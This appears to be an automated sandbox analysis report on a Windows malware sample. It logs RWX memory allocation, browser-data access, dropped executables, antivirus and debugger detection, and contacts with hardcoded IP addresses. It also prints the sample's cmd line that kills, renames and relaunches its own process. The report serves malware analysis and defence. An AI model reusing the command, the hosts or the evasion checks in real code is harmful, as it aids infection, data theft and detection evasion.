NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01020000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73402000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x034d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:52 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c11000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

svoutse.exe tried to sleep 1054 seconds, actually delayed analysis time by 1054 seconds

An application raised an exception which may be indicative of an exploit crash (4 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 2592 crashed
Application Crash	Process chrome.exe with pid 284 crashed
__exception__ Sept. 2, 2024, 10:52 a.m.	stacktrace: 0x4670f0 0x3b2e0a 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: b0 aa e6 76 00 00 00 00 20 4d 44 00 00 00 00 00 exception.instruction: mov al, -0x56 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4670f0 registers.r14: 186576704 registers.r15: 186577144 registers.rcx: 1276 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 114681920 registers.rsp: 186575880 registers.r11: 186580400 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1180 registers.r12: 6998640 registers.rbp: 186576016 registers.rdi: 6923104 registers.rax: 3878400 registers.r13: 186576576	1	0	0
__exception__ Sept. 2, 2024, 10:52 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 185657840 registers.r15: 185658280 registers.rcx: 1336 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 79670928 registers.rsp: 185657000 registers.r11: 185661536 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1356 registers.r12: 33344112 registers.rbp: 185657152 registers.rdi: 33268576 registers.rax: 3878400 registers.r13: 185657712	1	0	0

Steals private information from local Internet browsers (28 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D56250-11C.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D56249-8B4.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D56265-89C.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\old_GPUCache_000
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D5626A-628.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D5624B-A20.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D5626C-B24.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D5627B-C38.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66D56273-DA8.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\1000027000\7e0b49b7db.exe
file	C:\Users\test22\AppData\Roaming\1000026000\67c526b265.exe
file	C:\Users\test22\AppData\Local\Temp\1000028001\00ce99c2f6.exe

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /k "taskkill /f /im "explorti.exe" && timeout 1 && del "explorti.exe" && ren 0657d1 explorti.exe && C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe && Exit"

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
file	C:\Users\test22\AppData\Roaming\1000026000\67c526b265.exe
file	C:\Users\test22\AppData\Local\Temp\1000028001\00ce99c2f6.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
file	C:\Users\test22\AppData\Roaming\1000026000\67c526b265.exe
file	C:\Users\test22\AppData\Local\Temp\1000028001\00ce99c2f6.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorti.exe")

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 2, 2024, 10:58 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	1	1
ShellExecuteExW Sept. 2, 2024, 10:58 a.m.	show_type: 0 filepath_r: cmd parameters: /k "taskkill /f /im "explorti.exe" && timeout 1 && del "explorti.exe" && ren 0657d1 explorti.exe && C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe && Exit" filepath: cmd	1	1
ShellExecuteExW Sept. 2, 2024, 10:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe	1	1
ShellExecuteExW Sept. 2, 2024, 10:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\1000026000\67c526b265.exe parameters: filepath: C:\Users\test22\AppData\Roaming\1000026000\67c526b265.exe	1	1
ShellExecuteExW Sept. 2, 2024, 10:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\1000027000\7e0b49b7db.exe parameters: filepath: C:\Users\test22\AppData\Roaming\1000027000\7e0b49b7db.exe	1	1
ShellExecuteExW Sept. 2, 2024, 10:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000028001\00ce99c2f6.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000028001\00ce99c2f6.exe	1	1

An executable file was downloaded by the processes explorti.exe, svoutse.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile Sept. 2, 2024, 10:58 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌPJr>r>r>Ó=r>Ó;(r>]:r>]=r>];ýr>Ó:r>Ó?r>r?^r>7r>Ár><r>Richr>PEL²¿fàæÊPL@L?-@W kà¤8LT8L Ü@à.rsrcàì@À.idata î@À @+°ð@àwhdzemxcPð1Lò@àseiqbrkq@L>@à.taggant0PL"B@à request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 2, 2024, 10:59 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $¢båæõ¶æõ¶æõ¶u^¶þõ¶uk¶ëõ¶u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶uZ¶ôõ¶uh¶çõ¶Richæõ¶PELMÈfà ÈB"àhà@i«Û@Pð#døñ# Ð#<@à.rsrc à#L@À.idata ð#L@À p*$N@àbyoqafnq`pNXP@àshfyzeowÐh¨@à.taggant0àh"¬@à request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 2, 2024, 10:59 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $¢båæõ¶æõ¶æõ¶u^¶þõ¶uk¶ëõ¶u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶uZ¶ôõ¶uh¶çõ¶Richæõ¶PELMÈfà ÈB"àhà@i«Û@Pð#døñ# Ð#<@à.rsrc à#L@À.idata ð#L@À p*$N@àbyoqafnq`pNXP@àshfyzeowÐh¨@à.taggant0àh"¬@à request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 2, 2024, 10:59 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELO Õfà"¬ PwÀ @`!¢@@@d\|@ Èà uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcÈ@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè]N$èUÆ^ÃUìQSVWùûÿÿ@Ç8ûÿÿ\ÉIPûÿÿ:ûÿÿ\|üÿÿÀi3öVVVhHÉIÿÐÇI9·dýÿÿ[3ö9·4ýÿÿKËè®3ö9·Dýÿÿ3ö9·Týÿÿ·lýÿÿÎè÷º3ÉÇF@Ç9ûÿÿt5MüQMüQûÿÿè/ûÿÿ@ÈèÆ@Ç¸ûÿÿuÎÿlÈIOàÉkOÔÉu3Û_ÜOÄÉãO¤_Ìè`þÿÿè ·dþÿÿÎÇ<ÉIèÿvè¿èYýÿÿè\|ýÿÿè#lýÿÿè)º·\ýÿÿÎÇDÉIètÿvèèóÇLýÿÿ@ÉIY9Týÿÿòÿ·PýÿÿTýÿÿèXèóÇ<ýÿÿ@ÉIY9Dýÿÿñÿ·@ýÿÿDýÿÿè.èóÇ,ýÿÿ@ÉIY94ýÿÿðÿ·0ýÿÿ4ýÿÿèèY$ýÿÿÉù·ýÿÿÎÇ<ÉIè£ÿvèÚçYýÿÿÉãüüÿÿÉéèüÿÿè-ÐüÿÿèÄüÿÿÉÙÌüÿÿ¸üÿÿÉÙlüÿÿÀüÿÿèï\üÿÿèäLüÿÿèÙüÿÿèµ_^[ÉÃ`ýÿÿ°Àt#ÿ0ÿ5MÿÅI`ýÿÿ°ÉtQèØùÿÿF;·dýÿÿfýÿÿë¿qQèþàÎö þÿÿëëVñW3ÿN>è5N$è-N4èsPN`èkPèjÇ¼<ÉI¾À¾Ä¾ÈèiæY8Æ_^ÃVWùÉtQè_·¼ÎÇ<ÉIè6ÿvèmæYèÜO`è¯QO4è§QO$èÄO_^éºVñW3ÿ9~f_^ÃVñjVè×åYYÆ^ÂVñW3ÿ9~wf_^ÃFjÿ4¸è°åYYF$¸G;~sÝëâSVñ3ÛW¾d9u%\|èÿÿÿ¾p9u9=_^[ÃÏèÛëÎÏè=ëÚWùxÿÿÿ@Ç8xÿÿÿhÉIèhOðèóOàèëOÐèãOÀèÛO¬èÓOèËOèÃ\|ÿÿÿÉug_ÃVéË VWñè¶@öÉ _^ÃVqöÜ ^ÃWùu&?ÿu_ÃVw$Ïèij(WèäþYYöuæ^_ÃÿwèÓäYëÏVñÉtQèþÿÿìèP¼è&¬èèèN^éVWù3öD÷ÀN Fþ\|î_^ÃSVñ3ÛW8^ T 8^uNy8ÉtQè~^ ÿ_^[Ã³ëóVñN è²µÎè«µj@VèÐãYYÆ^ÂUìSÙVW{ {u)EÏ0è~µ7ÇGC{ _^[u Æ@]Â8ëÒ@8ëî3ÀÇMd3Éf£2MA¢4Mj 8M <M @M¢PMf£üM ôM øM¹úX M£DM£HM LMÃUìWù rVj@èãYÿuðÎèON8w^ÿ_]ÂUìVuWùVgèëåFO GFGFGF aPèÉåF0G0Ç_^]Â3Ò3À@AQQQQA,ÁQ Q(Q0ÃVñ&NèWèþèó¬èè¼èÝìè LjèEâÇ$\|ÉI ÿ ÇIFÆ^ÃjAZ @êuõÁÃSV5ÆI3ÛWùjXSGfÇG____j[ÇGÿÖSjG)ÿÖSh request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x0002dc00', u'virtual_address': u'0x00001000', u'entropy': 7.988355421365408, u'name': u' \\x00 ', u'virtual_size': u'0x00068000'}

entropy

7.98835542137

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0019aa00', u'virtual_address': u'0x00310000', u'entropy': 7.953079364825403, u'name': u'mlkfqtwe', u'virtual_size': u'0x0019b000'}

entropy

7.95307936483

description

A section with a high entropy has been found

entropy

0.994010345766

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 2, 2024, 10:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 2, 2024, 10:58 a.m.	status_code: 0x00000001 process_identifier: 2856 process_handle: 0x00000190		0	0
NtTerminateProcess Sept. 2, 2024, 10:58 a.m.	status_code: 0x00000001 process_identifier: 2856 process_handle: 0x00000190	1	0	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	taskkill /f /im "explorti.exe"
cmdline	"C:\Windows\System32\cmd.exe" /k "taskkill /f /im "explorti.exe" && timeout 1 && del "explorti.exe" && ren 0657d1 explorti.exe && C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe && Exit"
cmdline	cmd /k "taskkill /f /im "explorti.exe" && timeout 1 && del "explorti.exe" && ren 0657d1 explorti.exe && C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe && Exit"

Communicates with host for which no DNS query was performed (4 events)

host	185.215.113.100
host	185.215.113.19
host	31.41.244.10
host	31.41.244.11

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 376 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 2, 2024, 10:58 a.m.	class_name: FilemonClass window_name:		0	0
